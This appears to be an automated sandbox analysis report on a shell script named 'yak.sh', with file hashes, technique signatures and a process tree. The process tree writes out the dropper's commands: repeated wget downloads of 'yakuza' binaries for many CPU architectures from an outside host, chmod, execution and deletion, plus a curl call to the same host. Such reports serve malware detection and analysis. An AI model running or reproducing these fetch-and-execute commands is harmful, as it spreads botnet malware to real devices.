Analysis
-
max time kernel
149s -
max time network
132s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
-
submitted
23-11-2024 23:57
General
-
Target
yak.sh
-
Size
2KB
-
MD5
f50f60f970a5203dad27c480da7b4519
-
SHA1
f50f26900efe72f11c37767b5db9a3916a7c76b4
-
SHA256
ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf
-
SHA512
40c118ed8e7b22ba4c439cc3de9a9d69d7cccd9b4d109b00a716ea564379e001304edaffb0f9ca143e87cb0138f566aebea2e998b76c9bb4b653cf7a191e4ddd
Score
7/10
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
Processes
-
/tmp/yak.sh/tmp/yak.sh1⤵
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.mips2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod +x yakuza.mips2⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.mips./yakuza.mips2⤵
- System Network Configuration Discovery
-
-
/bin/rmrm -rf yakuza.mips2⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.mipsel2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod +x yakuza.mipsel2⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.mipsel./yakuza.mipsel2⤵
- System Network Configuration Discovery
-
-
/bin/rmrm -rf yakuza.mipsel2⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.sh2⤵
-
-
/bin/chmodchmod +x yakuza.sh2⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.sh./yakuza.sh2⤵
-
-
/bin/rmrm -rf yakuza.sh2⤵
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.x862⤵
-
-
/bin/chmodchmod +x yakuza.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.x86./yakuza.x862⤵
-
-
/bin/rmrm -rf yakuza.x862⤵
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.arm62⤵
-
-
/bin/chmodchmod +x yakuza.arm62⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.arm6./yakuza.arm62⤵
-
-
/bin/rmrm -rf yakuza.arm62⤵
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.i6862⤵
-
-
/bin/chmodchmod +x yakuza.i6862⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.i686./yakuza.i6862⤵
-
-
/bin/rmrm -rf yakuza.i6862⤵
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.ppc2⤵
-
-
/bin/chmodchmod +x yakuza.ppc2⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.ppc./yakuza.ppc2⤵
-
-
/bin/rmrm -rf yakuza.ppc2⤵
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.i5862⤵
-
-
/bin/chmodchmod +x yakuza.i5862⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.i586./yakuza.i5862⤵
-
-
/bin/rmrm -rf yakuza.i5862⤵
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.m68k2⤵
-
-
/bin/chmodchmod +x yakuza.m68k2⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.m68k./yakuza.m68k2⤵
-
-
/bin/rmrm -rf yakuza.m68k2⤵
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.arm42⤵
-
-
/bin/chmodchmod +x yakuza.arm42⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.arm4./yakuza.arm42⤵
-
-
/bin/rmrm -rf yakuza.arm42⤵
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.arm52⤵
-
-
/bin/chmodchmod +x yakuza.arm52⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.arm5./yakuza.arm52⤵
-
-
/bin/rmrm -rf yakuza.arm52⤵
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.arm72⤵
-
-
/bin/chmodchmod +x yakuza.arm72⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.arm7./yakuza.arm72⤵
-
-
/bin/rmrm -rf yakuza.arm72⤵
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.sparc2⤵
-
-
/bin/chmodchmod +x yakuza.sparc2⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.sparc./yakuza.sparc2⤵
-
-
/bin/rmrm -rf yakuza.sparc2⤵
-
-
/bin/bashbash2⤵
-
-
/usr/bin/curlcurl -s http://linux-it.abuser.eu/test.php2⤵
-